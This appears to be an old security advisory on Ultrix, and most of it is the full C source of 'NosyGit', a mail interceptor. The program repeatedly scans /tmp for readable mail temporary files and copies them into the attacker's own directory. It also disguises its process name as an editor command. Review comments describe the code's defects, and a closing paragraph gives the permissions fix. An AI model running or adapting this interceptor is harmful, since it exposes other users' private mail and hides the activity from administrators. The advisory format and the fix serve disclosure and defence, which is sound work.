COMMAND

    mail interception

SYSTEMS AFFECTED

    Ultrix

PROBLEM

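    The following is based on NosyGit V. 3.0 (The famous Staffs Poly Mail
    Interceptor) written by TFT.  The code will intercept incoming mail
    on an Ultrix machine.  It works by repeatedly scanning /tmp for files
    whose names begin with 'maa' and copying every one it is able to open
    for reading, so the exposure is a mail temporary file in a shared
    directory that other users can read.  You have to have a 'mail'
    directory (in your HOME) where the intercepted mail will be stored.
    Exploit follows (tested on Ultrix 4.2A):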

    #include <stdio.h>
    #include <string.h>
    /*
     * Endless polling loop: re-opens /tmp, asks getname() for each name that
     * starts with "maa", and copies /tmp/<name> to ./mail/<name> unless a file
     * of that name is already there.  Control never leaves the loop.
     *
     * NOTE(review): the copy only happens when the file in /tmp can be opened
     * for reading by the invoking user, so the condition being relied on is a
     * mail temporary file that other accounts can read in a shared directory.
     */
    main(argc,argv)
    int argc;
    char *argv[];
    {
      FILE *f,*f1,*f2;
      char *sp,temp[80],filename[80],fname[80],line[80];
    /* Overwrites argv[0] in place so that tools displaying the argument     */
    /* vector show an editor-like command instead of the real program name.  */
    /* The copy is unbounded: 12 bytes are written whatever the original     */
    /* length of argv[0].                                                    */
    /* NOTE(review): a displayed command that does not match the program     */
    /* actually executing is the tell for this kind of renaming.             */
      strcpy(argv[0],"e .login   ");
      mainloop:;
    /* Opens the /tmp directory itself as a stream; the result is not        */
    /* checked before it is handed to getname().                             */
    /* NOTE(review): this depends on the platform letting a directory be     */
    /* read as a plain file -- presumably true on the tested Ultrix 4.2A;    */
    /* confirm before assuming it applies to any other system.               */
      f=fopen("/tmp","r");

    /* f now refers to the directory data for /tmp */
      nextfile:;

    /* Ask getname() for the next name in the stream that begins with 'maa' */
      getname(f,filename);

    /* getname() stores the literal string "EOF" when the stream is exhausted */
      if (!strcmp(filename,"EOF")) goto no_more_files;

    /* Build the source path; fname is 80 bytes and no length check is made */
      sprintf(fname,"/tmp/%s",filename);

    /* Build the destination path, relative to the current directory */
      sprintf(temp,"./mail/%s",filename);

    /* If the destination can already be opened for reading, skip this name */
      f1=fopen(temp,"r");
      if (f1) {
         fclose(f1);
         goto nextfile;
              }

    /* Open the source; this succeeds only if the file is readable by the   */
    /* invoking user.  The destination is created only when that succeeded. */
    /* f1 is not checked: if the destination cannot be created, the         */
    /* fprintf below receives a null stream.                                */
      f2=fopen(fname,"r");
      if (f2) f1=fopen(temp,"w");
      if (f2) {

    /* Ring the terminal bell, print a notice, then copy the file in chunks */
    /* of at most 79 characters; sp serves only as the loop condition.      */
          putchar(7);
          printf("** NosyGit ** Got some new mail, stored it in ");
          printf ("mail/%s\n",filename);
          while(sp=fgets(line,80,f2)) fprintf(f1,"%s",line);
          fclose(f1);
          fclose(f2);
              }
      goto nextfile;
    /* Directory stream exhausted: close it and start another pass.  There  */
    /* is no delay between passes, so the process scans continuously.       */

      no_more_files:;
      fclose(f);
      goto mainloop;
    }

    /*
     * Scans the stream f byte by byte for the sequence 'm','a','a' and, when
     * found, stores "maa" plus the bytes that follow in filename.  When the
     * stream ends first, stores the string "EOF" instead.
     *
     * f        - stream to scan (the caller passes the opened /tmp directory)
     * filename - caller's buffer; no size is passed and none is checked
     *
     * Returns 0 when a name was stored; the "EOF" path falls off the end of
     * the function without a return statement.
     */
    getname(f,filename)
    FILE *f;
    char filename[];
    {
      int pos;
      /* fgetc() returns int; storing it in a char makes the EOF comparisons */
      /* below depend on whether plain char is signed on the platform.       */
      char current;
    loop:;

    /* Look for the byte sequence 'm','a','a'.  A mismatch at any step     */
    /* restarts the search with a freshly read byte.  The match is made on */
    /* raw stream bytes, not on parsed directory entries.                  */
        current=fgetc(f);if (current!=EOF && current!='m') goto loop;
        if (current==EOF) goto out;
        current=fgetc(f);if (current!=EOF && current!='a') goto loop;
        if (current==EOF) goto out;
        current=fgetc(f);if (current!=EOF && current!='a') goto loop;
        if (current==EOF) goto out;
        strcpy(filename,"maa");
        pos=3;
    next:;

    /* Append bytes with a value above 31 until one at or below 31 is read  */
    /* (taken to be the end of the name).  pos advances on every pass,      */
    /* including the one that reads the terminator, and is never compared   */
    /* with the size of the caller's buffer.                                */
          current=fgetc(f);
          if (current>31) filename[pos]=current;
          pos++;
        if (current>31) goto next;
      filename[pos]=0;
      return(0);

    /* Reached only by the gotos above, when the stream ran out */
    out:;

    /* No further name found: hand back the marker string "EOF" */
      strcpy(filename,"EOF");
    }

SOLUTION

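    This is a rather old system.  There has been a technological
    revolution, don't you know that?  I'm not sure whether this affects
    the latest Ultrix version, but if it does, I'm sure that there is no
    patch, since this code has been around for a while.  Because the code
    only succeeds when it can open the temporary file in /tmp for reading,
    the underlying remedy is for the mail software to create its temporary
    files with owner-only permissions, or outside a directory that other
    users can read.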